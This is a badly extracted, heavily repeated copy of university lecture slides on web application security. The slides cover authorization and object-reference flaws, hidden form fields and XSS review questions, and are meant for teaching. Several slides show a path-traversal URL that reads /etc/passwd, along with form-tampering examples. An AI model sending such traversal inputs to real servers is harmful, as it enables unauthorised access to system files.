ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 27: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 28: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 29: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 30: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 31: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 32: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 33: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 34: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 35: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 36: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 37: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 38: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary